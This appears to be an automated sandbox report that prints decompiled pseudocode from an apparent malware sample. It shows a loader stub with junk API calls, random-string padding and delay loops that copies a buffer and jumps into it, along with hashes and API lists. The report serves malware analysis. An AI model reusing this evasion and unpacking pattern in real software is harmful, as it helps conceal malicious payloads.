                			E00403870(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40, intOrPtr _a44, intOrPtr _a48, intOrPtr _a52, intOrPtr _a56, intOrPtr _a60, intOrPtr _a64, intOrPtr _a68, intOrPtr _a72, intOrPtr _a76, intOrPtr _a80, intOrPtr _a84, intOrPtr _a88, intOrPtr _a92, intOrPtr _a96, intOrPtr _a108, intOrPtr _a112, char _a116, intOrPtr _a120, long _a124, struct _CONSOLE_CURSOR_INFO _a128, struct _DCB _a140, struct _OSVERSIONINFOW _a176, char _a432, short _a472, void _a2484, char _a3504) {
                				short _v0;
                				short _v4;
                				intOrPtr _v8;
                				intOrPtr _v12;
                				intOrPtr _v16;
                				short _v20;
                				intOrPtr _v24;
                				intOrPtr _v28;
                				char _v32;
                				short _t305;
                				short _t306;
                				intOrPtr* _t468;
                				void* _t473;
                				intOrPtr* _t474;
                				void* _t483;
                
                				L0040EBC0(0x11dc);
                				if( *0x667f64 == 0xac) {
                					GetStringTypeExA(0, 0, "renenivucivefukuvemosudexiyozim", 0,  &_v0);
                					__imp__FindFirstVolumeMountPointW(L"gesorakocinobinuruyamikufiw",  &_a472, 0);
                					GetPrivateProfileIntA("jasozarinirazawiveyiy xupoyihelituwowakewezoyu gayasugudemexobahetoyesovunadub xesepalopuv", "fevadixifahazikiletidikowavative hiferof hadafotahufowojunazo", 0, "fucuwematahafenibezujulokoc yuyarahim");
                					WaitForSingleObject(0, 0);
                					E004046E4( &_a116);
                					E004047C2( &_a116);
                					L004046CB();
                					_push(0);
                					E00404A75();
                					E00404A46(0);
                					E00404A5C(0, 0);
                					_t483 = _t483 + 0x10;
                				}
                				 *0x667f64 =  *0x667f64 + 0x11b1b;
                				E00403790();
                				E004037B0();
                				_t305 = 0;
                				_v0 = 0;
                				if( *0x667f64 <= 0) {
                					L7:
                					_t306 = 0;
                					_v0 = 0;
                					do {
                						if( *0x667f64 + _t306 == 0xe) {
                							MapGenericMask(0, 0);
                							DebugBreak();
                							FreeConsole();
                							_v0(0);
                							FreeConsole();
                							InterlockedExchangeAdd( &_a124, 0);
                							WaitForMultipleObjectsEx(0, 0, 0, 0, 0);
                							_t306 = _v4;
                						}
                						_t306 = _t306 + 1;
                						_v0 = _t306;
                					} while (_t306 < 0x4fe229);
                					_t473 = 0x4cc;
                					do {
                						GetCharWidthW(0, 0, 0, 0);
                						GetCharABCWidthsFloatW(0, 0, 0, 0);
                						_t473 = _t473 - 1;
                					} while (_t473 != 0);
                					while(1) {
                						GetLastError();
                						if(_t473 < 0x3b9f945) {
                							_a20 = 0x3ae40fea;
                							_a72 = 0x4da9f927;
                							_v0 = 0x76dbcd96;
                							_a64 = 0x5c01b59;
                							_a52 = 0x69b972f0;
                							_a8 = 0x6315b1bc;
                							_a16 = 0x268efdf3;
                							_a76 = 0x758aab55;
                							_a56 = 0x293c9e6e;
                							_a48 = 0x7d25b6d7;
                							_a40 = 0x49f78072;
                							_a4 = 0x411e99f8;
                							_v4 = 0x58c56864;
                							_a108 = 0x3a5c90d5;
                							_a12 = 0x55787069;
                							_a116 = 0x61b5b59f;
                							_a96 = 0x739d0620;
                							_a36 = 0x3eef0288;
                							_a92 = 0x49cdaba2;
                							_a88 = 0x1f200a15;
                							_v12 = 0x6ab47c1e;
                							_a60 = 0x60bcbe35;
                							_v20 = 0x2247b61f;
                							_a68 = 0xb7d6359;
                							_a112 = 0xa8bb680;
                							_a28 = 0x5f860f6d;
                							_a44 = 0x1f006e87;
                							_a80 = 0x344135c6;
                							_v16 = 0x6da7e3e1;
                							_v32 = 0x479039f5;
                							_a84 = 0x9fa3415;
                							_v8 = 0x7c643086;
                							_v24 = 0x2694f336;
                							_v28 = 0x6cb4a5e8;
                							_a32 = 0x2d3a3b6a;
                							_a120 = 0x4b4207e4;
                							_a24 = 0x6a30f715;
                							_a124 = 0x40a7a320;
                							_a20 = _a20 - 0x3d2cd01f;
                							_a20 = _a20 - 0x1a8468ec;
                							_a72 = _a72 - 0x35b81e1b;
                							_v0 = _v0 - 0x1f2956f1;
                							_a72 = _a72 + 0x10bd938a;
                							_a72 = _a72 + 0x387b6b7d;
                							_a64 = _a64 + 0x55e9422f;
                							_a20 = _a20 + 0x2f9fc9;
                							_a64 = _a64 + 0x685f757d;
                							_v0 = _v0 + 0x18684b6a;
                							_v4 = _v4 + 0xc792e25;
                							_a12 = _a12 - 0x71c2a565;
                							_a40 = _a40 + 0x41d3e078;
                							_v0 = _v0 + 0x6066dbc4;
                							_a12 = _a12 - 0x1195370a;
                							_a40 = _a40 + 0x50570176;
                							_v0 = _v0 - 0x2bd3ed46;
                							_a92 = _a92 + 0x392008dc;
                							_a116 = _a116 - 0x5754d300;
                							_a60 = _a60 - 0x2ce43c9b;
                							_v4 = _v4 - 0x30721d20;
                							_a36 = _a36 - 0x2ccd0822;
                							_v20 = _v20 + 0x41048ed8;
                							_a96 = _a96 - 0xc569312;
                							_a60 = _a60 + 0x47dd74a5;
                							_a8 = _a8 - 0x28076cb2;
                							_a76 = _a76 - 0x436d683b;
                							_a96 = _a96 + 0x6106b7c4;
                							_v0 = _v0 - 0x41aae26e;
                							_a12 = _a12 - 0x5ce84155;
                							_a36 = _a36 + 0x2234c681;
                							_a64 = _a64 - 0x290d37f4;
                							_v16 = _v16 - 0x2476c0e6;
                							_a12 = _a12 - 0xfb5be67;
                							_v16 = _v16 + 0x69bdf9d;
                							_v28 = _v28 - 0x1cf7abbe;
                							_a4 = _a4 + 0xbea7d89;
                							_a60 = _a60 + 0x7a5b1c5b;
                							_a88 = _a88 - 0x18c76000;
                							_a76 = _a76 + 0x46a1d242;
                						}
                						if(_t473 > 0xbeedf1) {
                							break;
                						}
                						_t473 = _t473 + 1;
                						if(_t473 < 0x81043) {
                							continue;
                						}
                						break;
                					}
                					E00403660();
                					E00403770();
                					_t474 = __imp__ReplaceFileA;
                					_v32 = 0x7b;
                					do {
                						if( *0x667f64 == 0x86) {
                							 *_t474(0, 0, 0, 0, 0, 0);
                							WritePrivateProfileStringW(0, 0, 0, 0);
                						}
                						if( *0x667f64 == 0xf) {
                							lstrcmpiW(0, 0);
                							CreateEventW(0, 0, 0, 0);
                						}
                						_t292 =  &_v32;
                						 *_t292 = _v32 - 1;
                					} while ( *_t292 != 0);
                					_t468 = __imp__CreateActCtxA;
                					_v32 = 0x3078f;
                					do {
                						if( *0x667f64 == 0x83) {
                							MulDiv(0, 0, 0);
                							 *_t468( &_a128);
                							GetFileAttributesExW(0, 0,  &_a2484);
                							GetLogicalDriveStringsA(0,  &_a3504);
                							__imp__GetLongPathNameA(0,  &_a432, 0);
                							WritePrivateProfileStructW(0, 0, 0, 0, 0);
                							IsBadReadPtr(0, 0);
                							CancelWaitableTimer(0);
                							GetFileType(0);
                							GetModuleHandleA(0);
                						}
                						_t299 =  &_v32;
                						 *_t299 = _v32 - 1;
                					} while ( *_t299 != 0);
                					E004033B0();
                					 *0x667f58 =  *0x667ed4;
                					goto __eax;
                				} else {
                					do {
                						 *((char*)( *0x667ed4 + _t305)) =  *((intOrPtr*)( *0x66e6c0 + _t305 + 0x11b1b));
                						if( *0x667f64 == 0xa8) {
                							GetConsoleCursorInfo(0,  &_a128);
                							GetModuleFileNameW(0,  &_a472, 0);
                							EnumFontsW(0, L"hagayaxewewagucizinahegej", 0, 0);
                							GetVersionExW( &_a176);
                							__imp__GetConsoleAliasesLengthA(0);
                							SleepEx(0, 0);
                							CreateFileMappingW(0, 0, 0, 0, 0, 0);
                							CreateMutexA(0, 0, "wilofusasonamapofedahu");
                							GetCommState(0,  &_a140);
                							FreeConsole();
                							_t305 = _v20;
                						}
                						_t305 = _t305 + 1;
                						_v0 = _t305;
                					} while (_t305 <  *0x667f64);
                					goto L7;
                				}
                			}

                APIs
                • GetStringTypeExA.KERNEL32(00000000,00000000,renenivucivefukuvemosudexiyozim,00000000,?), ref: 0040389E
                • FindFirstVolumeMountPointW.KERNEL32(gesorakocinobinuruyamikufiw,?,00000000), ref: 004038B3
                • GetPrivateProfileIntA.KERNEL32 ref: 004038CA
                • WaitForSingleObject.KERNEL32(00000000,00000000), ref: 004038D4
                  • Part of subcall function 00404A46: __wcstoi64.LIBCMT ref: 00404A52
                  • Part of subcall function 00404A5C: __wcstoi64_l.LIBCMT ref: 00404A6B
                • GetConsoleCursorInfo.KERNEL32(00000000,?), ref: 0040398C
                • GetModuleFileNameW.KERNEL32(00000000,?,00000000), ref: 0040399A
                • EnumFontsW.GDI32(00000000,hagayaxewewagucizinahegej,00000000,00000000), ref: 004039A7
                • GetVersionExW.KERNEL32(?), ref: 004039B1
                • GetConsoleAliasesLengthA.KERNEL32(00000000), ref: 004039B9
                • SleepEx.KERNEL32(00000000,00000000), ref: 004039C3
                • CreateFileMappingW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 004039D5
                • CreateMutexA.KERNEL32(00000000,00000000,wilofusasonamapofedahu), ref: 004039E4
                • GetCommState.KERNEL32(00000000,?), ref: 004039F4
                • FreeConsole.KERNEL32 ref: 004039FA
                • MapGenericMask.ADVAPI32(00000000,00000000), ref: 00403A3A
                • DebugBreak.KERNEL32 ref: 00403A3C
                • FreeConsole.KERNEL32 ref: 00403A3E
                • AttachConsole.KERNEL32(00000000), ref: 00403A42
                • FreeConsole.KERNEL32 ref: 00403A44
                • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 00403A50
                • WaitForMultipleObjectsEx.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00403A60
                Memory Dump Source
                • Source File: 00000000.00000002.530438650.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.530431935.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.530462869.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.530477919.0000000000670000.00000002.00000001.01000000.00000003.sdmp
                Similarity
                • API ID: Console$Free$CreateFileWait$AliasesAttachBreakCommCursorDebugEnumExchangeFindFirstFontsGenericInfoInterlockedLengthMappingMaskModuleMountMultipleMutexNameObjectObjectsPointPrivateProfileSingleSleepStateStringTypeVersionVolume__wcstoi64__wcstoi64_l
                • String ID: )O$;hmC$>P$TDu$UA\$fevadixifahazikiletidikowavative hiferof hadafotahufowojunazo$fucuwematahafenibezujulokoc yuyarahim$gesorakocinobinuruyamikufiw$hagayaxewewagucizinahegej$j;:-$jasozarinirazawiveyiy xupoyihelituwowakewezoyu gayasugudemexobahetoyesovunadub xesepalopuv$renenivucivefukuvemosudexiyozim$wilofusasonamapofedahu${${*,$}k{8$}u_h
                • API String ID: 3618697742-3763550029
                • Opcode ID: c3ab265132682f6d0abb0ea47d043840aa86616c5551d2cd178f555f647553a2
                • Instruction ID: c8618d58610d18ae7664207781e6ad4b49abab7244f618895114b1a2e8edddd5
                • Opcode Fuzzy Hash: c3ab265132682f6d0abb0ea47d043840aa86616c5551d2cd178f555f647553a2
                • Instruction Fuzzy Hash: 6502A9756083809FE360DF65D946B4ABBF4FB84705F10482DF699AB2A0C7B49984CF0B
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • _hwrite.KERNEL32(00000000,00000000,00000000), ref: 0040444C
                • FindAtomW.KERNEL32(00000000), ref: 00404453
                • GetStdHandle.KERNEL32(00000000), ref: 0040445A
                • _calloc.LIBCMT ref: 00404482
                  • Part of subcall function 00404A06: __calloc_impl.LIBCMT ref: 00404A1B
                • _calloc.LIBCMT ref: 00404489
                  • Part of subcall function 00404A80: __indefinite.LIBCMT ref: 00406887
                • __floor_pentium4.LIBCMT ref: 004044C4
                • _fputwc.LIBCMT ref: 004044CD
                  • Part of subcall function 00404C4D: _malloc.LIBCMT ref: 00404C67
                • CharLowerBuffA.USER32(?,00000000,313180DD,3802937C,2322E823,2322E823,151A9CB0,58FE3BFC,3B78AB07,1190BBCD,5370C228,5204C22F,46857BF5,1ADEE1C7,5FA5E152,65B098C1), ref: 00404561
                • GetModuleHandleA.KERNEL32(kernel32.dll,313180DD,3802937C,2322E823,2322E823,151A9CB0,58FE3BFC,3B78AB07,1190BBCD,5370C228,5204C22F,46857BF5,1ADEE1C7,5FA5E152,65B098C1,786D3085), ref: 00404576
                Memory Dump Source
                • Source File: 00000000.00000002.530438650.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.530431935.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.530462869.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.530477919.0000000000670000.00000002.00000001.01000000.00000003.sdmp
                Similarity
                • API ID: Handle_calloc$AtomBuffCharFindLowerModule__calloc_impl__floor_pentium4__indefinite_fputwc_hwrite_malloc
                • String ID: #"#$.d|1$K[$T#0y$ZBE$kernel32.dll
                • API String ID: 2239919688-992971717
                • Opcode ID: 4f630acdbfd7b5b1266d8c80dfe78307f3496ad164effe4b94313500278a85e3
                • Instruction ID: c66ba64033baa81c8e24b855b7833866e70bb26c4f574454c8bbbbec6359a038
                • Opcode Fuzzy Hash: 4f630acdbfd7b5b1266d8c80dfe78307f3496ad164effe4b94313500278a85e3
                • Instruction Fuzzy Hash: 79D12CB5608380CFD3609F2AD885B8BFBE4BF85714F10891DE69A8B661D7348884CF57
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 57%
                			E0041251A(void* _a4, signed int _a16, signed int _a20, short* _a24) {
                				signed int _v8;
                				short _v10;
                				signed int _v12;
                				signed int _v14;
                				signed int _v16;
                				signed int _v18;
                				signed int _v20;
                				char _v25;
                				signed int _v26;
                				signed int _v28;
                				signed int _v30;
                				signed int _v32;
                				signed int _v34;
                				signed int _v36;
                				char _v41;
                				signed int _v42;
                				char _v43;
                				signed int _v44;
                				char _v45;
                				char _v46;
                				char _v47;
                				char _v48;
                				char _v49;
                				char _v50;
                				char _v51;
                				char _v52;
                				intOrPtr _v56;
                				intOrPtr _v60;
                				char _v62;
                				char _v64;
                				signed int _v68;
                				signed int _v72;
                				signed int _v76;
                				signed int _v80;
                				signed int _v84;
                				signed int _v88;
                				signed int _v92;
                				signed int _v96;
                				unsigned int _v100;
                				intOrPtr _v104;
                				signed short* _v108;
                				signed short* _v112;
                				signed int _v116;
                				char _v120;
                				void* __ebx;
                				void* __edi;
                				void* __esi;
                				signed int _t367;
                				signed short _t377;
                				signed int _t379;
                				signed int _t386;
                				signed int* _t388;
                				intOrPtr _t389;
                				unsigned int _t392;
                				signed int _t395;
                				signed int _t396;
                				intOrPtr _t397;
                				void* _t420;
                				signed int _t429;
                				unsigned int _t430;
                				signed short* _t435;
                				signed int _t437;
                				signed int _t443;
                				intOrPtr _t447;
                				signed int _t456;
                				unsigned int _t457;
                				signed int _t470;
                				signed int _t473;
                				short* _t479;
                				signed int _t483;
                				char* _t487;
                				intOrPtr* _t488;
                				signed int _t489;
                				signed int _t497;
                				signed short _t504;
                				char* _t510;
                				unsigned int _t512;
                				signed int _t514;
                				unsigned int _t517;
                				signed int _t522;
                				signed int _t523;
                				signed int _t524;
                				signed int _t544;
                				signed int _t546;
                				signed int _t548;
                				signed int _t551;
                				signed int _t552;
                				void* _t554;
                				signed int _t560;
                				signed int _t573;
                				signed int _t574;
                				char _t587;
                				signed int _t588;
                				unsigned int _t590;
                				signed int _t592;
                				signed int _t593;
                				signed int _t595;
                				signed int _t600;
                				signed int _t601;
                				signed int _t602;
                				intOrPtr _t607;
                				signed int _t609;
                				signed int* _t614;
                				signed int _t619;
                				signed int _t620;
                				signed int _t622;
                				signed int _t632;
                				signed int _t638;
                				signed int* _t647;
                				signed int _t653;
                
                				_t367 =  *0x42a280; // 0x394af7
                				_v8 = _t367 ^ _t653;
                				_t479 = _a24;
                				asm("movsd");
                				asm("movsd");
                				asm("movsw");
                				_t574 = _v12;
                				_t497 = _t574 & 0x00008000;
                				_t575 = _t574 & 0x00007fff;
                				_v100 = _t479;
                				_v52 = 0xcc;
                				_v51 = 0xcc;
                				_v50 = 0xcc;
                				_v49 = 0xcc;
                				_v48 = 0xcc;
                				_v47 = 0xcc;
                				_v46 = 0xcc;
                				_v45 = 0xcc;
                				_v44 = 0xcc;
                				_v43 = 0xcc;
                				_v42 = 0xfb;
                				_v41 = 0x3f;
                				_v120 = 1;
                				_v116 = _t497;
                				if(_t497 == 0) {
                					 *((char*)(_t479 + 2)) = 0x20;
                				} else {
                					 *((char*)(_t479 + 2)) = 0x2d;
                				}
                				_t625 = _v16;
                				_t609 = _v20;
                				if(_t575 != 0 || _t625 != 0 || _t609 != 0) {
                					__eflags = _t575 - 0x7fff;
                					if(_t575 != 0x7fff) {
                						_t377 = (((_t575 & 0x0000ffff) >> 0x00000008) + (_t625 >> 0x00000018) * 0x00000002) * 0x0000004d + (_t575 & 0x0000ffff) * 0x00004d10 - 0x134312f4 >> 0x00000010 & 0x0000ffff;
                						_v36 = 0;
                						_t483 =  ~_t377;
                						_v80 = _t377;
                						_v26 = _t575;
                						_v30 = _t625;
                						_v34 = _t609;
                						_v104 = 0x42b320;
                						__eflags = _t483;
                						if(__eflags == 0) {
                							L86:
                							_t504 = _v28 >> 0x10;
                							__eflags = _t504 - 0x3fff;
                							if(_t504 < 0x3fff) {
                								L139:
                								__eflags = _a20 & 0x00000001;
                								_t575 = _v100;
                								_t379 = _v80;
                								_t609 = _a16;
                								 *_t575 = _t379;
                								if((_a20 & 0x00000001) == 0) {
                									L142:
                									__eflags = _t609 - 0x15;
                									if(_t609 > 0x15) {
                										_t609 = 0x15;
                									}
                									_t625 = (_v28 >> 0x10) - 0x3ffe;
                									__eflags = 0;
                									_v26 = 0;
                									_v72 = 8;
                									do {
                										_v36 = _v36 << 1;
                										_t305 =  &_v72;
                										 *_t305 = _v72 - 1;
                										__eflags =  *_t305;
                										_v32 = _v32 + _v32 | _v36 >> 0x0000001f;
                										_v28 = _v28 + _v28 | _v32 >> 0x0000001f;
                									} while ( *_t305 != 0);
                									__eflags = _t625;
                									if(_t625 >= 0) {
                										L149:
                										_t386 = _t609 + 1;
                										_t487 = _t575 + 4;
                										_v68 = _t487;
                										_v80 = _t386;
                										__eflags = _t386;
                										if(_t386 <= 0) {
                											L161:
                											_t488 = _t487 - 1;
                											_t489 = _t488 - 1;
                											__eflags =  *_t488 - 0x35;
                											if( *_t488 >= 0x35) {
                												while(1) {
                													__eflags = _t489 - _v68;
                													if(_t489 < _v68) {
                														break;
                													}
                													__eflags =  *_t489 - 0x39;
                													if( *_t489 != 0x39) {
                														break;
                													}
                													 *_t489 = 0x30;
                													_t489 = _t489 - 1;
                													__eflags = _t489;
                												}
                												_t388 = _v100;
                												__eflags = _t489 - _v68;
                												if(_t489 < _v68) {
                													_t489 = _t489 + 1;
                													 *_t388 =  *_t388 + 1;
                													__eflags =  *_t388;
                												}
                												 *_t489 =  *_t489 + 1;
                												__eflags =  *_t489;
                												L169:
                												_t489 = _t489 - _t388 - 3;
                												__eflags = _t489;
                												_t388[0] = _t489;
                												 *((char*)( &(_t388[1]) + _t489)) = 0;
                												_t389 = _v120;
                												goto L170;
                											}
                											_t510 = _v68;
                											while(1) {
                												__eflags = _t489 - _t510;
                												if(_t489 < _t510) {
                													break;
                												}
                												__eflags =  *_t489 - 0x30;
                												if( *_t489 != 0x30) {
                													break;
                												}
                												_t489 = _t489 - 1;
                												__eflags = _t489;
                											}
                											_t388 = _v100;
                											__eflags = _t489 - _t510;
                											if(_t489 >= _t510) {
                												goto L169;
                											}
                											 *_t388 = 0;
                											__eflags = _v116 - 0x8000;
                											_t388[0] = 1;
                											_t575 = ((0x8000 | __eflags != 0x00000000) - 0x00000001 & 0x0000000d) + 0x20;
                											_t388[0] = ((0x8000 | __eflags != 0x00000000) - 0x00000001 & 0x0000000d) + 0x20;
                											 *_t510 = 0x30;
                											_t388[1] = 0;
                											goto L7;
                										} else {
                											goto L150;
                										}
                										do {
                											L150:
                											_t392 = _v32;
                											asm("movsd");
                											asm("movsd");
                											asm("movsd");
                											_v36 = _v36 << 1;
                											_v36 = _v36 << 1;
                											_t512 = _t392 + _t392 | _v36 >> 0x0000001f;
                											_t587 = _v64;
                											_t514 = (_v28 + _v28 | _t392 >> 0x0000001f) + (_v28 + _v28 | _t392 >> 0x0000001f) | _t512 >> 0x0000001f;
                											_t395 = _v36;
                											_t632 = _t512 + _t512 | _v36 >> 0x0000001f;
                											_t609 = _t587 + _t395;
                											__eflags = _t609 - _t395;
                											if(_t609 < _t395) {
                												L152:
                												_t396 = _t632 + 1;
                												_t588 = 0;
                												__eflags = _t396 - _t632;
                												if(_t396 < _t632) {
                													L154:
                													_t588 = 1;
                													__eflags = 1;
                													L155:
                													_t632 = _t396;
                													__eflags = _t588;
                													if(_t588 != 0) {
                														_t514 = _t514 + 1;
                														__eflags = _t514;
                													}
                													L157:
                													_t397 = _v60;
                													_t590 = _t397 + _t632;
                													_v72 = _t590;
                													__eflags = _t590 - _t632;
                													if(_t590 < _t632) {
                														L159:
                														_t514 = _t514 + 1;
                														__eflags = _t514;
                														goto L160;
                													}
                													__eflags = _t590 - _t397;
                													if(_t590 >= _t397) {
                														goto L160;
                													}
                													goto L159;
                												}
                												__eflags = _t396 - 1;
                												if(_t396 >= 1) {
                													goto L155;
                												}
                												goto L154;
                											}
                											__eflags = _t609 - _t587;
                											if(_t609 >= _t587) {
                												goto L157;
                											}
                											goto L152;
                											L160:
                											_t575 = _t590 >> 0x1f;
                											_t517 = _t514 + _v56 + _t514 + _v56 | _t590 >> 0x0000001f;
                											_v36 = _t609 + _t609;
                											_t634 = _v72;
                											_v28 = _t517;
                											_t625 = _v72 + _t634 | _t609 >> 0x0000001f;
                											 *_t487 = (_t517 >> 0x18) + 0x30;
                											_t487 = _t487 + 1;
                											_v80 = _v80 - 1;
                											__eflags = _v80;
                											_v32 = _v72 + _t634 | _t609 >> 0x0000001f;
                											_v25 = 0;
                										} while (_v80 > 0);
                										goto L161;
                									}
                									_t625 =  ~_t625 & 0x000000ff;
                									__eflags = _t625;
                									if(_t625 <= 0) {
                										goto L149;
                									} else {
                										goto L148;
                									}
                									do {
                										L148:
                										_v28 = _v28 >> 1;
                										_t625 = _t625 - 1;
                										_v32 = _v32 >> 0x00000001 | _v28 << 0x0000001f;
                										_v36 = _v36 >> 0x00000001 | _v32 << 0x0000001f;
                										__eflags = _t625;
                									} while (_t625 > 0);
                									goto L149;
                								}
                								_t609 = _t609 + _t379;
                								__eflags = _t609;
                								if(_t609 > 0) {
                									goto L142;
                								}
                								 *_t575 = 0;
                								__eflags = _v116 - 0x8000;
                								 *((char*)(_t575 + 3)) = 1;
                								 *((char*)(_t575 + 2)) = ((0x8000 | _v116 != 0x00008000) - 0x00000001 & 0x0000000d) + 0x20;
                								 *((char*)(_t575 + 4)) = 0x30;
                								 *((char*)(_t575 + 5)) = 0;
                								goto L7;
                							}
                							_v80 = _v80 + 1;
                							_v84 = 0;
                							_v20 = 0;
                							_v16 = 0;
                							_v12 = 0;
                							_t592 = _v42;
                							_t522 = _t504 & 0x0000ffff;
                							_t523 = _t522 & 0x00007fff;
                							_t593 = _t592 & 0x00007fff;
                							_t489 = (_t592 ^ _t522) & 0x00008000;
                							_v96 = _t489;
                							_t625 = _t593 + _t523 & 0x0000ffff;
                							__eflags = _t523 - 0x7fff;
                							if(_t523 >= 0x7fff) {
                								L137:
                								__eflags = _t489;
                								_v32 = _v32 & 0x00000000;
                								_t416 = ((0 | _t489 == 0x00000000) - 0x00000001 & 0x80000000) + 0x7fff8000;
                								_t280 =  &_v36;
                								 *_t280 = _v36 & 0x00000000;
                								__eflags =  *_t280;
                								L138:
                								_v28 = _t416;
                								goto L139;
                							}
                							__eflags = _t593 - 0x7fff;
                							if(_t593 >= 0x7fff) {
                								goto L137;
                							}
                							__eflags = _t625 - 0xbffd;
                							if(_t625 > 0xbffd) {
                								goto L137;
                							}
                							__eflags = _t625 - 0x3fbf;
                							if(_t625 > 0x3fbf) {
                								_t416 = 0;
                								__eflags = _t523;
                								if(_t523 != 0) {
                									L100:
                									__eflags = _t593 - _t416;
                									if(_t593 != _t416) {
                										L104:
                										_v92 = _t416;
                										_t614 =  &_v16;
                										_v68 = 5;
                										do {
                											_t524 = _v68;
                											_t420 = _v92 + _v92;
                											_v88 = _t524;
                											__eflags = _t524;
                											if(_t524 <= 0) {
                												goto L113;
                											}
                											_v76 =  &_v44;
                											_t435 = _t653 + _t420 - 0x20;
                											do {
                												_v72 = _v72 & 0x00000000;
                												_t544 = ( *_v76 & 0x0000ffff) * ( *_t435 & 0x0000ffff);
                												_t595 =  *(_t614 - 4);
                												_t489 = _t595 + _t544;
                												__eflags = _t489 - _t595;
                												if(_t489 < _t595) {
                													L109:
                													_v72 = 1;
                													goto L110;
                												}
                												__eflags = _t489 - _t544;
                												if(_t489 >= _t544) {
                													goto L110;
                												}
                												goto L109;
                												L110:
                												__eflags = _v72;
                												 *(_t614 - 4) = _t489;
                												if(_v72 != 0) {
                													 *_t614 =  *_t614 + 1;
                													__eflags =  *_t614;
                												}
                												_v76 = _v76 - 2;
                												_t435 =  &(_t435[1]);
                												_v88 = _v88 - 1;
                												__eflags = _v88;
                											} while (_v88 > 0);
                											L113:
                											_t614 =  &(_t614[0]);
                											_v92 = _v92 + 1;
                											_v68 = _v68 - 1;
                											__eflags = _v68;
                										} while (_v68 > 0);
                										_t638 = _t625 + 0xc002;
                										__eflags = _t638;
                										if(_t638 <= 0) {
                											L118:
                											_t625 = _t638 + 0xffff;
                											__eflags = _t625;
                											if(_t625 >= 0) {
                												L125:
                												__eflags = _v20 - 0x8000;
                												if(_v20 > 0x8000) {
                													L127:
                													__eflags = _v18 - 0xffffffff;
                													if(_v18 != 0xffffffff) {
                														_t260 =  &_v18;
                														 *_t260 = _v18 + 1;
                														__eflags =  *_t260;
                													} else {
                														_v18 = _v18 & 0x00000000;
                														__eflags = _v14 - 0xffffffff;
                														if(_v14 != 0xffffffff) {
                															_v14 = _v14 + 1;
                														} else {
                															_v14 = _v14 & 0x00000000;
                															__eflags = _v10 - 0xffff;
                															if(_v10 != 0xffff) {
                																_v10 = _v10 + 1;
                															} else {
                																_v10 = 0x8000;
                																_t625 = _t625 + 1;
                															}
                														}
                													}
                													L134:
                													__eflags = _t625 - 0x7fff;
                													if(_t625 < 0x7fff) {
                														_t625 = _t625 | _v96;
                														_v36 = _v18;
                														_v34 = _v16;
                														_v30 = _v12;
                														_v26 = _t625;
                													} else {
                														__eflags = _v96;
                														_v32 = 0;
                														_v36 = 0;
                														_v28 = ((0 | _v96 == 0x00000000) - 0x00000001 & 0x80000000) + 0x7fff8000;
                													}
                													goto L139;
                												}
                												__eflags = (_v20 & 0x0001ffff) - 0x18000;
                												if((_v20 & 0x0001ffff) != 0x18000) {
                													goto L134;
                												}
                												goto L127;
                											}
                											_t429 =  ~_t625 & 0x0000ffff;
                											_t625 = _t625 + _t429;
                											__eflags = _t625;
                											do {
                												__eflags = _v20 & 0x00000001;
                												if((_v20 & 0x00000001) != 0) {
                													_t233 =  &_v84;
                													 *_t233 = _v84 + 1;
                													__eflags =  *_t233;
                												}
                												_v12 = _v12 >> 1;
                												_t429 = _t429 - 1;
                												__eflags = _t429;
                												_v16 = _v16 >> 0x00000001 | _v12 << 0x0000001f;
                												_v20 = _v20 >> 0x00000001 | _v16 << 0x0000001f;
                											} while (_t429 != 0);
                											__eflags = _v84 - _t429;
                											if(_v84 != _t429) {
                												_t244 =  &_v20;
                												 *_t244 = _v20 | 0x00000001;
                												__eflags =  *_t244;
                											}
                											goto L125;
                										} else {
                											goto L115;
                										}
                										while(1) {
                											L115:
                											_t619 = _v12;
                											__eflags = _t619;
                											if(_t619 < 0) {
                												break;
                											}
                											_t430 = _v16;
                											_v20 = _v20 << 1;
                											_v16 = _t430 + _t430 | _v20 >> 0x0000001f;
                											_t638 = _t638 + 0xffff;
                											_v12 = _t619 + _t619 | _t430 >> 0x0000001f;
                											__eflags = _t638;
                											if(_t638 > 0) {
                												continue;
                											}
                											break;
                										}
                										__eflags = _t638;
                										if(_t638 > 0) {
                											goto L125;
                										}
                										goto L118;
                									}
                									_t625 = _t625 + 1;
                									__eflags = _v44 & 0x7fffffff;
                									if((_v44 & 0x7fffffff) != 0) {
                										goto L104;
                									}
                									__eflags = _v48 - _t416;
                									if(_v48 != _t416) {
                										goto L104;
                									}
                									__eflags = _v52 - _t416;
                									if(_v52 == _t416) {
                										L92:
                										_v32 = _t416;
                										_v36 = _t416;
                										goto L138;
                									}
                									goto L104;
                								}
                								_t625 = _t625 + 1;
                								__eflags = _v28 & 0x7fffffff;
                								if((_v28 & 0x7fffffff) != 0) {
                									goto L100;
                								}
                								__eflags = _v32;
                								if(_v32 != 0) {
                									goto L100;
                								}
                								__eflags = _v36;
                								if(_v36 != 0) {
                									goto L100;
                								}
                								_v26 = 0;
                								goto L139;
                							}
                							_t416 = 0;
                							__eflags = 0;
                							goto L92;
                						} else {
                							if(__eflags < 0) {
                								_t483 =  ~_t483;
                								__eflags = 0x42b4e0;
                								_v104 = 0x42b480;
                							}
                							__eflags = _t483;
                							if(_t483 == 0) {
                								goto L86;
                							} else {
                								goto L32;
                							}
                							do {
                								L32:
                								_v104 = _v104 + 0x54;
                								_t546 = _t483 & 0x00000007;
                								_t483 = _t483 >> 3;
                								__eflags = _t546;
                								if(_t546 == 0) {
                									L84:
                									_t625 = 0;
                									__eflags = 0;
                									goto L85;
                								}
                								_t548 = _t546 * 0xc + _v104;
                								_t437 = _t548;
                								_v72 = _t548;
